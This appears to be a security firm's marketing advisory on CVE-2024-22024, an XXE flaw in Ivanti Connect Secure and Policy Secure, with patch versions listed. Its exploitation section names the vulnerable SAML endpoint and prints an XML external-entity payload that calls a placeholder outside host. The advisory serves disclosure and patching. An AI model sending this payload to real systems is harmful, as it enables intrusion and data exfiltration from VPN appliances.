Get a security evaluation today !

CVE-2024-22024, a newly disclosed vulnerability affecting Ivanti Connect Secure and Ivanti Policy Secure software, poses a significant threat to network security. These software solutions, utilized for connecting devices to virtual private networks (VPNs), are vulnerable to exploitation by remote attackers through maliciously crafted XML files. What exacerbates the situation is the existence of a known, publicly accessible exploit, heightening the urgency for immediate action. 

 

This vulnerability, the latest in a series of high and critical vulnerabilities discovered within a single month (CVE-2024-21893, CVE-2024-21887, CVE-2024-21888), underscores the importance of robust security measures in the face of evolving threats. Particularly concerning is the detection of exploitation of previous vulnerabilities in the wild, raising the possibility of similar exploitation of CVE-2024-22024. 

 

Ivanti Connect Secure and Ivanti Policy Secure, originally developed by Pulse Secure before Ivanti’s acquisition in 2020, are pivotal software solutions facilitating secure communications and network management through VPNs. Organizations utilizing these solutions must prioritize prompt patching and proactive security measures to mitigate the risk posed by CVE-2024-22024 and similar vulnerabilities, safeguarding their network infrastructure from potential exploitation and data breaches. 

Table of Contents:
1.Exploitation Methodology
2. Recommendation
3. Conclusion
 

Exploitation Methodology 

 Exploitation of this vulnerability necessitates the availability of the web service to the attacker. The vulnerable endpoint identified is “/dana-na/auth/saml-sso.cgi” 

 


Burp Request 

 To exploit it, the attacker simply needs to craft a POST request containing a parameter named “SAMLRequest”, with a malicious XML payload. This payload should include an entity referencing either internal server resources or external addresses. 

  burp
Burp Request 

 The Base64-encoded payload is employed for transmission. 

Payload:  

<?xml version=”1.0″ ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM “http://{{external-host}}/x”> %xxe;]><r></r> 

 To exploit this vulnerability, the payload should be sent as a SAMLRequest parameter to the endpoint 127.0.0.1/dana-na/auth/saml-sso.cgi. The intention is to prompt the vulnerable application (Ivanti Connect Secure) to parse the XML document and interact with the external entity referenced in the payload, potentially resulting in unauthorized access or other security compromises. 

  burp
Burp Request 

 

Recommendation 

 The recommended course of action is to promptly update the Ivanti software to one of the recently patched versions that address this vulnerability. Specifically, for each respective product line, the following versions are advised: 

  • Ivanti Connect Secure: Versions 9.1R14.5, 9.1R17.3, 9.1R18.4, 22.4R2.3, 22.5R1.2, 22.5R2.3, and 22.6R2.2 
  • Ivanti Policy Secure: Versions 9.1R17.3, 9.1R18.4, and 22.5R1.2 
  • ZTA gateways: Versions 22.5R1.6, 22.6R1.5, and 22.6R1.7

    Concluding Thoughts 

 CVE-2024-22024 presents a serious vulnerability in Ivanti Connect Secure and Ivanti Policy Secure software. The existence of a public exploit and the potential for remote attackers to gain unauthorized access to sensitive data necessitates immediate action. Organizations relying on these solutions should prioritize patching their systems to the latest versions mentioned in the recommendation section. This vulnerability highlights the critical need for robust security practices and continuous vigilance against evolving threats. By implementing prompt patching procedures and maintaining proactive security measures, organizations can safeguard their network infrastructure and prevent potential security breaches.

Contact ValueMentor today to secure your Ivanti software and safeguard your organization’s sensitive data. 

Schedule your free consultation! 

Get A Security Evaluation Today !

Contact Us

Share

Categories

Related Posts